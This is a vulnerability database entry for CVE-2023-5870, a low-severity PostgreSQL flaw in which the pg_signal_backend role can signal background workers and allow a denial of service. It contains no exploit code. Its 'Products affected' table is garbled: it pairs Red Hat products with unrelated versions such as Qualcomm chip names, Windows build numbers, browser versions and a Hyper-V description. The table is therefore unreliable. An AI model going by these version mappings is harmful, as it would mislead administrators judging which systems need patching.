CVE-2023-5870

Postgresql: role pg_signal_backend can signal certain superuser processes.

Published: 12/10/2023 Last updated: 12/2/2024 Reserved: 10/31/2023

A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack.

CNA assigner: redhat (53f830b8-0a3f-465b-8143-3b8a9948e749) Requested by: n/a

Metrics

Version	Score	Severity	Vector String
3.1	2.2	Low	CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L

Opam packages affected (5)

conf-mingw-w64-postgresql-i686 conf-mingw-w64-postgresql-x86_64 conf-postgresql ocsigen-start postgresql

Products affected (45)

Product	Vendor	Version
RHACS-4.1-RHEL-8	Red Hat	9.0.0.1
RHACS-3.74-RHEL-8	Red Hat	6.0.5
Red Hat Advanced Cluster Security 4.2	Red Hat	2.9.0 through 2.9.4
Red Hat Advanced Cluster Security 4.2	Red Hat	IPQ5332
RHACS-3.74-RHEL-8	Red Hat	6.2.0
RHACS-4.1-RHEL-8	Red Hat	QCN9000
Red Hat Advanced Cluster Security 4.2	Red Hat	IPQ6005
RHACS-4.1-RHEL-8	Red Hat	< 10.0.14393.6709
RHACS-3.74-RHEL-8	Red Hat	QCN6023
Red Hat Advanced Cluster Security 4.2	Red Hat	IPQ6018
RHACS-4.1-RHEL-8	Red Hat	<= 3.11.1
RHACS-3.74-RHEL-8	Red Hat	< 86.0.4240.198
RHACS-4.1-RHEL-8	Red Hat	QCN9024
RHACS-3.74-RHEL-8	Red Hat	2.06
Red Hat Advanced Cluster Security 4.2	Red Hat	< 6.3.9600.20120
Red Hat Enterprise Linux 6	Red Hat	Hyper-V in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows 10 Gold, 1511, and 1607; and Windows Server 2016
Red Hat Enterprise Linux 9.2 Extended Update Support	Red Hat	n/a
Red Hat Enterprise Linux 9.0 Extended Update Support	Red Hat	QCA9984
Red Hat Enterprise Linux 7	Red Hat	<= 3.3.0.3_20160517
Red Hat Enterprise Linux 9	Red Hat	QCA8085
Red Hat Enterprise Linux 8	Red Hat	32-bit Systems Service Pack 2
Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions	Red Hat	n/a
Red Hat Enterprise Linux 8	Red Hat	2.4.6
Red Hat Enterprise Linux 8.2 Advanced Update Support	Red Hat	2.4.8
Red Hat Enterprise Linux 8.2 Telecommunications Update Service	Red Hat	QAM8650P
Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support	Red Hat	< 6.0.6003.21218
Red Hat Enterprise Linux 8.4 Telecommunications Update Service	Red Hat	QCA6431
Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions	Red Hat	12.2.6
Red Hat Enterprise Linux 8.6 Extended Update Support	Red Hat	<= 5.4.4
Red Hat Enterprise Linux 8.8 Extended Update Support	Red Hat	n/a
Red Hat Enterprise Linux 8	Red Hat	= 0.40.0
Red Hat Enterprise Linux 8.8 Extended Update Support	Red Hat	<= 5.2.6
Red Hat Enterprise Linux 8.6 Extended Update Support	Red Hat	5.6.3
Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions	Red Hat	QCA6584AU
Red Hat Enterprise Linux 8.4 Telecommunications Update Service	Red Hat	QCA6564A
Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support	Red Hat	QCA6426
Red Hat Enterprise Linux 8	Red Hat	2.4.7
Red Hat Enterprise Linux 9.2 Extended Update Support	Red Hat	n/a
Red Hat Enterprise Linux 9	Red Hat	QCA9377
Red Hat Enterprise Linux 8.8 Extended Update Support	Red Hat	< 10.0.17763.5458
Red Hat Enterprise Linux 9	Red Hat	QCS4290
Red Hat Enterprise Linux 8	Red Hat	32-bit Systems Service Pack 2 (Server Core installation)
Red Hat Software Collections	Red Hat	< 12.3
Red Hat Software Collections for Red Hat Enterprise Linux 7	Red Hat	QCM5430
Red Hat Software Collections for Red Hat Enterprise Linux 7	Red Hat	QCM6125

References (51)

Credits (1)

Upstream acknowledges Hemanth Sandrana and Mahendrakar Srinivasarao as the original reporters.